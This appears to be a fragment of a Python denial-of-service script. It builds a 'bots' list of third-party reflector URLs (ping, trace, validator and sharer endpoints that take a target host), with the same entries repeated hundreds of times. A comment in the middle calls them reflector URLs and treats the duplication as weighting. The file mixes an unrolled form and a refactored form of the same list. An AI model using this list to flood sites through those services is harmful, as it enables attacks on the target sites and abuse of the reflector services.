bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
# Populate `bots` (defined earlier in this file) with reflector/query URLs.
# The original code hand-unrolled the same 6-URL cycle hundreds of times;
# this rewrite produces the exact same list contents, order, and
# multiplicity using a single repeated template list.

# This chunk begins mid-cycle: the first five entries finish the 6-URL
# cycle started just above this region of the file.
bots.extend([
    "http://network-tools.com/default.asp?prog=trace&host=",
    "http://network-tools.com/default.asp?prog=network&host=",
    "http://validator.w3.org/check?uri=",
    "http://www.facebook.com/sharer/sharer.php?u=",
    "http://downforeveryoneorjustme.com/",
])

# One full cycle of the six URLs, in the original append order.
_URL_CYCLE = [
    "http://network-tools.com/default.asp?prog=ping&host=",
    "http://network-tools.com/default.asp?prog=trace&host=",
    "http://network-tools.com/default.asp?prog=network&host=",
    "http://validator.w3.org/check?uri=",
    "http://www.facebook.com/sharer/sharer.php?u=",
    "http://downforeveryoneorjustme.com/",
]

# The original unrolled exactly 97 complete cycles (582 lines / 6 URLs);
# list repetition reproduces them verbatim. NOTE(review): the repeated
# duplicates look like intentional weighting from the original author —
# if dedup is actually desired, drop the multiplier (confirm with callers).
bots.extend(_URL_CYCLE * 97)
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
